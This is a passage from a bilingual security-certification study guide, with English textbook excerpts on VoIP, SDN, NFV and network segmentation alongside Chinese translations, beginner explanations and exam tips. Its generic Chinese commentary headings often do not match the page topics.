enable location-independent file storage, transmission, and retrieval over LAN, WAN, or public internet connections. iSCSI is often viewed as a low-cost alternative to Fibre Channel. InfiniBand over Ethernet InfiniBand over Ethernet (IBoE) refers to the encapsulation of InfiniBand traffic within Ethernet frames, allowing InfiniBand protocols to run over Ethernet networks. InfiniBand is a highperformance and low-latency interconnect technology commonly used in high-performance computing (HPC) environments. IBoE provides a way to integrate InfiniBand technology into existing Ethernet infrastructures.

Compute Express Link Compute Express Link (CXL) is an advanced high-speed interconnect technology developed to address the increasing demands of data-intensive workloads in modern computing systems. It is designed to enhance the performance, efficiency, and scalability of datacentric applications in various domains such as artificial intelligence (AI), machine learning (ML), HPC, and more. As a converged protocol, CXL supports the communication and collaboration of various components, such as CPUs, GPUs, accelerators, memory, and other devices, over a single highspeed interconnect.

Other concepts that may be considered examples of converged technologies include VPN, SDN, cloud, virtualization, SOA, microservices, and serverless architecture. Voice over Internet Protocol (VoIP) Voice over IP (VoIP) is a tunneling mechanism that encapsulates audio, video, and other data into IP packets to support voice calls and multimedia collaboration. VoIP has become a popular and inexpensive telephony solution for companies and individuals worldwide. VoIP has the potential to replace or supplant public switched telephone network (PSTN) services because it's often less expensive and offers a wider variety of options and features.

VoIP can be used as a direct telephone replacement on computer networks as well as mobile devices. VoIP is considered a converged protocol as it combines the audio (and video) encapsulation technology (operating as Application Layer protocols) with the established multilayer protocol stack of TCP/IP. VoIP is available in both commercial and open source options. Some VoIP solutions require specialized hardware to either replace traditional telephone handsets/base stations or allow these to connect to and function over the VoIP system. Some VoIP solutions are software only, such as Skype, and

中文直译 / 整理

在局域网、广域网或公共互联网连接上实现位置无关的文件存储、传输和检索。 iSCSI 常被视为光纤通道的低成本替代方案。 以太网上的InfiniBand 以太网上的InfiniBand(IBoE) 指的是将I nfiniBand流量封装在以太网帧中,从而使InfiniBand协议能够在以太网网络 上运行。 InfiniBand是一种高性能、低延迟的互连技术,通常用于高性能计算 (HPC)环境。 IBoE提供了一种将InfiniBand技术集成到现有以太网基础设施 中的方法。 Compute Express Link Compute Express Link(CXL)是一种先进的高 速互连技术,旨在应对现代计算系统中数据密集型工作负载日益增长的需求。 它旨在提升人工智能(AI)、机器学习(ML)、HPC等各个领域中以数据为 中心的应用的性能、效率和可扩展性。 作为一种融合协议,CXL支持CPU、 GPU、加速器、内存及其他设备通过单一高速互连进行通信与协作。 其他可视为融合技术示例的概念包括VPN、SDN、云、虚拟化、SOA、微服 务和无服务器架构。

互联网语音协议(VoIP) 互联网语音协议(VoIP)是一种隧道机制,将音频、视频和其他数据封装 到IP数据包中,以支持语音通话和多媒体协作。 VoIP已成为全球公司和个人广 泛使用且成本低廉的电话解决方案。 由于通常成本更低且提供更丰富的选项和 功能,VoIP有潜力取代或替代公共交换电话网络(PSTN)服务。 VoIP可直接 作为计算机网络和移动设备上的电话替代方案使用。 VoIP被视为一种融合协议, 因为它将音频(和视频)封装技术(作为应用层协议运行)与已建立的 TCP/IP多层协议栈相结合。 VoIP 提供商业和开源两种选择。 一些 VoIP 解决方案需要专用硬件,以替代 传统电话听筒/基站,或使这些设备能够连接并基于 VoIP 系统运行。 一些 VoIP 解决方案仅为软件,例如 Skype,且

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

TCP/IP 模型:TCP/IP 是现实网络常用协议栈,和 OSI 可对应理解。

虚拟专用网络 VPN:VPN 在不可信网络上建立加密隧道。

强制访问控制 MAC:MAC 由系统根据标签和级别强制决定访问。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 758 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

考试常让你把协议、端口、层次对应起来。

远程访问、站点到站点、安全隧道常对应 VPN/IPSec。

政府/军方、机密级别、标签、不可由用户随意改通常是 MAC。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
TCP/IP 模型 TCP/IP 是现实网络常用协议栈,和 OSI 可对应理解。
虚拟专用网络 VPN VPN 在不可信网络上建立加密隧道。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 41 / PDF P759

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

allow the user's existing speakers, microphone, or headset to replace the traditional telephone handset. Others are hardware-based, such as magicJack, which allows the use of existing PSTN phone devices plugged into a USB adapter to take advantage of VoIP over the Internet. Commercial VoIP equipment typically looks and functions much like traditional PSTN equipment but simply replaces the prior plain old telephone service (POTS) line with VoIP connectivity. Often, VoIP-to-VoIP calls are free (assuming the same or compatible VoIP technology are in use on both ends), whereas VoIPto-landline or VoIP-to-mobile calls are usually charged a per-minute fee.

It is important to keep security in mind when selecting a VoIP solution to ensure that it provides the privacy and security you expect. Some VoIP systems are essentially plain-form communications that are easily intercepted and eavesdropped; others are highly encrypted, and any attempt to interfere or wiretap is deterred and thwarted. VoIP is not without its problems. Threat actors can wage a wide range of potential attacks against a VoIP solution: Caller ID can be falsified easily using any number of VoIP tools, so threat actors can perform vishing (VoIP phishing) or Spam over Internet Telephony (SPIT) attacks.

The call manager systems and VoIP phones themselves might be vulnerable to host operating system attacks and DoS attacks. If a device's or software's host OS or firmware has vulnerabilities, there is increased risk of exploits. Threat actors might be able to perform AitM attacks by spoofing call managers or endpoint connection negotiations and/or responses. Depending on the deployment, there are also risks associated with deploying VoIP phones off the same switches as desktop and server systems. This could allow for 802.1X authentication falsification as well as VLAN and VoIP hopping (i.e., jumping across authenticated channels).

Since VoIP traffic is just network traffic, it is often possible to listen in on VoIP communications by decoding the VoIP traffic when it isn't encrypted. Secure Real-Time Transport Protocol or Secure RTP (SRTP) is a security improvement over the Real-Time Transport Protocol (RTP) that is used in many VoIP communications. SRTP aims to minimize the risk of DoS, AitM

中文直译 / 整理

允许用户现有的扬声器、麦克风或耳机替代传统电话听筒。 其他则是基于硬件 的,例如 magicJack,它允许将现有的 PSTN 电话设备插入 USB 适配器,以 利用互联网上的 VoIP 服务。 商业 VoIP 设备通常外观和功能与传统的 PSTN 设备非常相似,只是将之前的 普通老式电话服务(POTS) 线路替换为 VoIP 连 接。 通常,VoIP 到 VoIP 的通话是免费的(假设两端使用相同或兼容的 VoIP 技术),而 VoIP 到固话或 VoIP 到移动电话的通话通常按分钟收费。 在选择VoIP解决方案时,保持安全意识至关重要,以确保其提供您所期望的 隐私和安全性。 一些VoIP系统本质上是未经加密的通信,容易被截获和窃听; 而另一些则具有高度加密功能,任何干扰或窃听行为都会被阻止和挫败。 VoIP并非没有问题。 攻击者可以对VoIP解决方案发动多种潜在攻击: 来电显示可以使用多种VoIP工具轻易伪造,因此攻击者可以实施语音钓鱼 (VoIP钓鱼)或互联网电话垃圾语音(SPIT)攻击。 呼叫管理器系统和VoIP电话本身可能容易受到主机操作系统攻击和拒绝服 务(DoS)攻击。

如果设备或软件的主机操作系统或固件存在漏洞,则遭 受利用的风险会增加。 攻击者可能通过伪造呼叫管理器或端点连接协商和/或响应来实施中间人 (AitM)攻击。 根据部署情况,在与桌面和服务器系统共用同一交换机的情况下部署 VoIP电话也存在风险。 这可能导致802.1X身份验证伪造,以及VLAN和 VoIP跳转(即跨越已认证通道)。 由于VoIP流量只是网络流量,因此在未加密的情况下,通常可以通过解码 VoIP流量来监听VoIP通信。 安全实时传输协议 或 安全RTP(SRTP) 是对 实时传输协议(RTP) 的安全改进,广泛 用于许多VoIP通信中。 SRTP旨在通过强大的加密和可靠的认证来降低DoS、中间人

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

加密:加密把内容变成未授权者看不懂的形式。

身份:身份是主体在系统中的标识。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

身份管理题要区分识别、认证、授权、审计。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
加密 加密把内容变成未授权者看不懂的形式。
身份 身份是主体在系统中的标识。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 42 / PDF P760

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

attacks, and other VoIP exploits through robust encryption and reliable authentication. RTP or SRTP takes over after Session Initiation Protocol (SIP) establishes the communication link between endpoints. Software-Defined Networking Software-defined networking (SDN) is a unique approach to network operation, design, and management. The concept is based on the theory that the complexities of a traditional network with on-device configuration (i.e., routers and switches) often force an organization to stick with a single device vendor and limit the flexibility of the network to adapt to changing physical and business conditions, as well as optimize costs of acquiring new devices.

SDN aims to separate the infrastructure layer (aka the data plane and the forwarding plane)—hardware and hardware-based settings—from the control layer—network services of data transmission management. The control plane uses protocols to decide where to send traffic, and the data plane includes rules that decide whether traffic will be forwarded. This form of traffic management also involves access control over what systems can communicate which protocols to whom. This type of access control is typically attribute-based access control (ABAC) based.

Instead of traditional networking equipment such as routers and switches, an SDN solution gives an organization the option to handle traffic routing using simpler network devices that accept instructions from the SDN controller. This eliminates some of the complexity related to traditional networking protocols. Furthermore, this also removes the traditional networking concepts of IP addressing, subnets, routing, and the like from needing to be programmed into or be deciphered by hosted applications. SDN offers a new network design that is directly programmable from a central location, flexible, vendor-neutral, and open-standards-based.

Using SDN frees an organization from having to purchase devices from a single vendor. It instead allows organizations to mix and match hardware as needed, such as to select the most cost-effective or highest throughput–rated devices regardless of vendor. The configuration and management of hardware are then controlled through a centralized management interface. APIs (application programming interfaces) play a crucial role in SDN by providing a standardized way for external software applications to interact with and manipulate the network. In addition, the settings applied to the hardware can be changed and adjusted dynamically as needed from a central console or control point.

中文直译 / 整理

攻击和其他VoIP漏洞的风险。 在 会话初始协议(SIP) 建立端点之间的通 信链路后,RTP或SRTP接管后续工作。 软件定义网络 软件定义网络(SDN) 是一种独特的网络运营、设计和管理方法。 该概念基于 这样的理论:传统网络的复杂性,如设备上的配置(即路由器和交换机),常 常迫使组织只能使用单一设备供应商,并限制了网络适应不断变化的物理和业 务条件以及优化新设备采购成本的灵活性。 SDN 旨在将基础设施层(又称数据 平面和转发平面)——硬件和基于硬件的设置——与控制层——数据传输管理的 网络服务——分离开来。 控制平面使用协议来决定流量的转发路径,而数据平 面则包含决定流量是否被转发的规则。 这种流量管理形式还涉及对哪些系统可 以与哪些对象通信哪些协议的访问控制。 此类访问控制通常基于属性的访问控 制(ABAC)。 与传统的网络设备(如路由器和交换机)不同,SDN 解决方案使组织能够使用 更简单的网络设备来处理流量路由,这些设备接受 SDN 控制器的指令。 这消 除了与传统网络协议相关的一些复杂性。 此外,这也消除了将 IP 地址、子网、 路由等传统网络概念编程或解析到托管应用程序中的需求。

SDN 提供了一种全新的网络设计,可通过中央位置直接编程,具有灵活性、厂 商中立性,并基于开放标准。 使用 SDN 可使组织无需从单一厂商购买设备,而 是可以根据需要混合搭配硬件,例如无论厂商如何,均可选择最具成本效益或 最高吞吐量的设备。 硬件的配置和管理则通过集中式管理接口进行控制。 API (应用程序编程接口)在 SDN 中发挥着关键作用,为外部软件应用程序提供了 一种标准化方式,以与网络进行交互并对其进行操作。 此外,应用于硬件的设 置可通过中央控制台或控制点动态地进行更改和调整。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

成本效益:安全控制不能无限堆钱,要用合理成本降低最重要的风险。

认证:认证是验证“你是不是你声称的那个人”。

加密:加密把内容变成未授权者看不懂的形式。

标准:标准给出必须满足的最低要求。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

CISSP 喜欢考成本收益:控制成本不应明显超过被降低的风险价值。

密码、令牌、生物特征、多因素认证都服务认证。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

Minimum level、mandatory requirement 常对应 standard。

Step-by-step、SOP 常对应 procedure。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
成本效益 安全控制不能无限堆钱,要用合理成本降低最重要的风险。
认证 认证是验证“你是不是你声称的那个人”。
加密 加密把内容变成未授权者看不懂的形式。
标准 标准给出必须满足的最低要求。
程序 程序是一步一步怎么做。
基于属性的访问控制 ABAC ABAC 根据用户、资源、环境等属性动态决策。
学习单元 43 / PDF P761

第 761 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

In relation to SDN, a southbound interface is the communication path from the SDN controller to the network devices in the data plane, facilitating the control and management of network traffic. The northbound interface is the communication path from the SDN controller to the applications or services in the Application Layer, allowing applications to interact with the SDN controller and make use of the network's programmability. These terms describe the flow of information between different components within an SDN framework.

Sometimes the terms eastbound and westbound are used to describe communications within a layer of a network or services’ lattice structure (i.e., between peer elements). SDN and network functions virtualization (NFV) are two distinct but closely related concepts that have transformed the traditional networking landscape. While SDN focuses on the separation of the control plane and data plane, NFV is about virtualizing and abstracting network functions from dedicated hardware devices. When combined, SDN and NFV create a more flexible, scalable, and programmable network infrastructure. It is effectively network virtualization.

It allows data transmission paths, communication decision trees, and flow control to be virtualized in the SDN/NFV control layer rather than being handled on the hardware on a per-device basis. Another interesting development arising out of the concept of virtualized networks is that of a virtual SAN (VSAN). A SAN is a network technology that combines multiple individual storage devices into a single consolidated network-accessible storage container. They are often used with multiple or clustered servers that need high-speed access to a single shared dataset. These have historically been expensive due to the complex hardware requirements of the SAN.

VSANs bypass these complexities with virtualization. A virtual SAN or a software-defined shared storage system is a virtual re-creation of a SAN on top of a virtualized network or an SDN. Software-defined storage (SDS) is another derivative of SDN. SDS is a SDN version of a SAN or NAS. SDS is a storage management and provisioning solution that is policy driven and is independent of the actual underlying storage hardware. It is effectively virtual storage.

中文直译 / 整理

与 SDN 相关,南向接口是 SDN 控制器与数据平面中网络设备之间的通信路 径,用于实现对网络流量的控制和管理。 北向接口是 SDN 控制器与应用层应 用程序或服务之间的通信路径,允许应用程序与 SDN 控制器交互并利用网络 的可编程性。 这些术语描述了 SDN 框架内不同组件之间的信息流。 有时使用东向和西向这两个术语来描述网络某一层或服务网格结构 内的通信(即对等元素之间的通信)。 软件定义网络(SDN)和网络功能虚拟化(NFV)是两个独立但密切相关的概 念,它们改变了传统的网络格局。 SDN侧重于控制平面与数据平面的分离,而 NFV则致力于将网络功能从专用硬件设备中虚拟化和抽象出来。 当两者结合时, SDN和NFV共同构建出更加灵活、可扩展且可编程的网络基础设施。 这本质上 是网络虚拟化,它允许数据传输路径、通信决策树和流量控制在SDN/NFV控 制层中实现虚拟化,而非在每个硬件设备上单独处理。 虚拟网络概念带来的另一个有趣发展是虚拟SAN(VSAN)。 SAN是一种网络 技术,它将多个独立的存储设备整合为一个统一的、可通过网络访问的存储容 器。 它们通常用于需要高速访问单一共享数据集的多台服务器或集群服务器。

由于SAN对硬件要求复杂,传统上成本较高。 VSAN通过虚拟化规避了这些复 杂性。 虚拟SAN或软件定义的共享存储系统,是在虚拟化网络或SDN之上对 SAN进行的虚拟重构。 软件定义存储(SDS) 是 SDN 的另一种衍生形式。 SDS 是 SAN 或 NAS 的 SDN 版本。 SDS 是一种策略驱动且独立于实际底层存储硬件的存储管理和配 置解决方案。 它本质上是虚拟存储。

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

抽象:抽象把复杂细节藏在接口后,只暴露必要功能。

政策:政策是高层原则,说明必须遵守什么。

程序:程序是一步一步怎么做。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 761 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

对象、角色、组、接口都可能体现 abstraction。

Policy 高层、强制、稳定;Procedure 具体步骤。

Step-by-step、SOP 常对应 procedure。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
抽象 抽象把复杂细节藏在接口后,只暴露必要功能。
政策 政策是高层原则,说明必须遵守什么。
程序 程序是一步一步怎么做。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 44 / PDF P762

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

Software-defined wide-area networks (SDWAN or SD-WAN) are an evolution of SDN that can be used to manage the connectivity and control services between distant data centers, remote locations, and cloud services over WAN links. Segmentation Networks are not typically configured as a single large collection of systems. Usually, networks are segmented or subdivided into smaller organizational units.

These smaller units, groupings, segments, or subnetworks (i.e., subnets) can be used to improve various aspects of the network: Boosting Network Performance Network segmentation can improve performance through an organizational scheme in which systems that often communicate are located in the same segment. Also, dividing broadcast domains can significantly improve performance for larger networks. Reducing Communication Problems Network segmentation often reduces congestion and contains communication problems, such as broadcast storms. Providing Security Network segmentation can also improve security by isolating traffic and user access to those segments where they are authorized.

Physical segmentation refers to the practice of physically separating different components or segments within a network or system to enhance security, isolate sensitive information, and control access. This segmentation is typically achieved through various means, and different types of physical segmentation include in-band, out-of-band, and air-gapped. In-band segmentation involves the use of the same communication path or network infrastructure for both data and control traffic. Components within the same in-band segment share the same network resources. Often this is synonymous with logical segmentation as it does not use physical divisions for segmentation.

Out-of-band segmentation involves separating data and controlling traffic onto different communication paths or networks. Control signals and management traffic have a dedicated network that is distinct from the network used for regular data transmission. An out-of-band segment creates a separate and distinct network structure for traffic that would otherwise interfere with the production network or that may itself be put at risk if placed on the production network. Secondary (or additional) network

中文直译 / 整理

软件定义广域网(SDWAN或SD-WAN) 是 SDN 的演进形式,可用于通过广 域网链路管理远程数据中心、远程站点和云服务之间的连接与控制服务。 分段 网络通常不会被配置为一个单一的大型系统集合。 通常,网络会被分段或划 分为更小的组织单元。 这些较小的单元、分组、分段或子网络(即子网)可 用于改善网络的各个方面: 提升网络性能 网络分段 可以通过一种组织方案来提升性能,该方案将经常通信 的系统置于同一分段中。 此外,划分广播域可以显著改善大型网络的性能。 减少通信问题 网络分段通常能减少拥塞并遏制通信问题,例如广播风暴。 提供安全性 网络分段还可以通过隔离流量和用户访问权限,仅允许其在授权的分 段中进行访问,从而提升安全性。 物理隔离是指通过物理方式将网络或系统中的不同组件或段分开,以增强安全 性、隔离敏感信息并控制访问。 这种隔离通常通过多种手段实现,物理隔离的 类型包括带内、带外和气隙隔离。 带内隔离使用相同的通信路径或网络基础设 施传输数据和控制流量。 同一带内段内的组件共享相同的网络资源。 这通常与 逻辑隔离同义,因为它并未使用物理划分进行隔离。 带外隔离是将数据流量和 控制流量分离到不同的通信路径或网络上。

控制信号和管理流量使用一个与常 规数据传输网络完全独立的专用网络。 带外隔离为那些可能干扰生产网络或若 置于生产网络中可能面临风险的流量创建了一个独立且不同的网络结构。 次要 (或附加)网络

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

日志:日志记录系统和用户活动,用于监控、审计和调查。

遏制:遏制先阻止事件继续扩大,不急着完全修复。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

ISO 偏标准和管理体系。

日志要保护完整性、时间同步和访问控制。

事件响应中先控制影响,再根除原因。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
日志 日志记录系统和用户活动,用于监控、审计和调查。
遏制 遏制先阻止事件继续扩大,不急着完全修复。
学习单元 45 / PDF P763

完整性:数据要正确、可信、未被乱改

完整性不只是防黑客篡改,也包括防授权用户误操作。

教材原文段落

paths or segments may be created to support data storage traffic (such as with SANs), VoIP, backup data, patch distribution, and management operations. Air-gapped segmentation is the most stringent form of physical segmentation, where there is a complete physical separation between two systems or networks. This isolation is typically achieved by having no direct physical connection, such as cables, between the systems. There is also a need to either avoid the use of wireless communications or to block them purposefully.

Logical segmentation can be created by using switch-based virtual local area networks (VLANs), virtual private networks (VPNs), routers, firewalls, virtual routing and forwarding (VRF), and virtual domains individually or in combination. VLANs are a method of logically dividing a physical LAN into multiple isolated broadcast domains. Devices within the same VLAN can communicate with each other as if they were on the same physical network, even if they are located on different physical segments. VLANs help improve network performance, security, and flexibility by grouping devices logically instead of relying solely on physical network topology.

VLANs are commonly used in enterprise networks to segregate traffic based on departments, functions, or security levels. VPNs create secure and encrypted communication channels over a public or shared network (usually the Internet). They allow remote users or branch offices to securely connect to the main corporate network, creating a virtual private network. VPNs provide secure communication over untrusted networks, ensuring privacy and data integrity. They are widely used for remote access, site-to-site connectivity, and secure communication between different entities. VRF is a technology that allows multiple instances of a routing table to coexist within a router.

Each VRF instance operates as a separate and independent routing domain, enabling the isolation of routing information. VRF is often used in service provider networks to provide virtualization and isolation for different customers or departments. It allows the same physical router to maintain separate routing tables for different VRF instances, preventing the leakage of routing information between them. Virtual domains, also known as virtual systems or virtual contexts, involve creating isolated instances of a network device, such as a firewall or switch, to operate independently. Each virtual domain has its own configuration and

中文直译 / 整理

路径或段可能被创建以支持数据存储流量(如SAN)、VoIP、备份数据、补丁分发 和管理操作。 气隙隔离是最严格的物理隔离形式,指两个系统或网络之间完全物理分离。 这 种隔离通常通过避免系统之间存在任何直接物理连接(如电缆)来实现。 同时, 还需要避免使用无线通信,或有意识地阻断无线通信。 逻辑隔离可以通过使用基于交换机的虚拟局域网(VLAN)、虚拟专用网络 (VPN)、路由器、防火墙、虚拟路由和转发(VRF)以及虚拟域单独或组合 实现。 VLAN 是一种将物理局域网逻辑划分为多个隔离广播域的方法。 同一 VLAN 内 的设备可以像处于同一物理网络中一样相互通信,即使它们位于不同的物理段 上。 VLAN 通过按逻辑而非仅依赖物理网络拓扑对设备进行分组,从而提升网 络性能、安全性和灵活性。 VLAN 常用于企业网络中,根据部门、功能或安全 级别隔离流量。 VPN 在公共或共享网络(通常是互联网)上创建安全且加密的通信通道。 它 们允许远程用户或分支机构安全地连接到主企业网络,从而构建虚拟专用网 络。 VPN 可在不可信的网络上提供安全通信,确保隐私和数据完整性。 它们 广泛用于远程访问、站点到站点连接以及不同实体之间的安全通信。

VRF 是一种技术,允许在路由器内同时存在多个路由表实例。 每个 VRF 实例 作为独立的路由域运行,实现路由信息的隔离。 VRF 常用于服务提供商网络, 为不同客户或部门提供虚拟化和隔离功能。 它允许同一台物理路由器为不同的 VRF 实例维护独立的路由表,防止路由信息在它们之间泄露。 虚拟域,也称为虚拟系统或虚拟上下文,涉及创建网络设备(如防火墙或交换 机)的隔离实例以独立运行。 每个虚拟域都有其自己的配置和

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:完整性不只是防黑客篡改,也包括防授权用户误操作。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

加密:加密把内容变成未授权者看不懂的形式。

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

防火墙:防火墙根据规则控制网络流量进出。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“完整性:数据要正确、可信、未被乱改”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

哈希、数字签名、变更控制、输入校验常对应完整性。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

ISO 偏标准和管理体系。

防火墙不是万能;它常与 IDS/IPS、分段、日志一起使用。

远程访问、站点到站点、安全隧道常对应 VPN/IPSec。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
加密 加密把内容变成未授权者看不懂的形式。
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
防火墙 防火墙根据规则控制网络流量进出。
虚拟专用网络 VPN VPN 在不可信网络上建立加密隧道。
日志 日志记录系统和用户活动,用于监控、审计和调查。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 46 / PDF P764

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

operates as a separate logical entity. Virtual domains allow multiple customers or departments to use the same physical network device while maintaining logical separation. This is common in firewall appliances where different organizations or business units require dedicated firewall policies. A private LAN or intranet, a screened subnet, and an extranet are all types of network segments. Another example of network segmentation is a VPC. A virtual private cloud (VPC) is a virtualized network infrastructure provided by a cloud computing service provider. It allows users to create and manage isolated, logically segmented networks within the public cloud environment.

A VPC enables organizations to host their applications and resources in a secure and dedicated space in the cloud while maintaining control over network configuration. An evolution of the concept of network segmentation is micro-segmentation. Micro-segmentation is a network security strategy that involves dividing a network into small, isolated segments to enhance security and minimize the potential impact of security breaches. Micro-segmentation may potentially create divisions as small as a single device, such as a high-value server or even a client or endpoint device.

This approach focuses on applying finegrained security controls to individual workloads, applications, or devices within the network. Any and all communications between zones are filtered, may require authentication, often require session encryption, and may be subjected to allow list and block list control (i.e., authorization) and be closely monitored and logged. In some cases, to communicate with entities external to the local segment, the communication must be encapsulated for egress. This is similar to using a VPN to access a remote network. Microsegmentation is a key element in implementing zero trust (see Chapter 8, “Principles of Security Models, Design, and Capabilities”).

